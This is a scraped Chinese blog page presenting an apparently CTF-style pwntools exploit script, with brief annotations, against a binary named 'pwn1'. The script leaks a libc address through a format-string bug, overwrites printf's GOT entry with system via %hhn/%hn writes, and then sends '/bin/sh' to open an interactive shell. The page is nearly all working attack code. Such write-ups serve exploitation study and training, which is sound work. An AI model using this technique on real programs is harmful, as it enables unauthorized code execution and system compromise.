zoukankan      html  css  js  c++  java
  • exp分析

    1 from pwn import*
     2 
     3 local =1
     4 debug = 1
     5 
     6 if local:
     7     p = process('./pwn1')
     8 else:
     9     p = remote("127.0.0.1",8080)
    10 
    11 #context.log_level = 'debug'
    12 '''
    13 if debug:
    14     gdb.attach(p)
    15 '''
    16 def fms(data):
    17     p.recvuntil("input$",timeout=4)
    18     p.sendline("1")
    19     p.recvuntil("please input your name:
    ")
    20     p.sendline(data)
    21 
    22 
    23 libc = ELF("/lib/i386-linux-gnu/libc.so.6")
    24 elf = ELF('./pwn1')
    25 
    26 fms('%35$p')
    27 
    28 libc_start_main_addr = int(p.recv(10),16) - 243    #__libc_start_main//?
    29 libc_addr = libc_start_main_addr - libc.symbols['__libc_start_main']//?
    30 print "libc_addr =",hex(libc_addr)
    31 
    32 printf_got = elf.got['printf']//got表地址
    33 print "printf_got =",hex(printf_got)
    34 
    35 system_addr =libc_addr + libc.symbols['system']//symbols['system']函数地址
    36 print "system_addr =",hex(system_addr)
    37 //ELF模块
    38 #make stack
    39 make_stack = 'a' * 0x30 + p32(printf_got) + p32(printf_got + 0x1) 
    40 fms(make_stack)
    41 #gdb.attach(p)
    42 
    43 payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn"
    44 payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn" 
    45 print "payload=",payload
    46 
    47 fms(payload)
    48 fms('/bin/shx00')
    49 p.interactive()
  • 相关阅读:
    日期时间工具(dayjs)的使用
    Apache JMeter下载使用
    webpack 干货总结
    常见设计模式——模板方法
    常见设计模式——代理模式
    Codeforces Round #340 (Div. 2)E
    HDU 4547
    HDU 2586
    LCA算法的介绍与模板
    1073. 负二进制数相加
  • 原文地址:https://www.cnblogs.com/liuyimin/p/8029855.html
Copyright © 2011-2022 走看看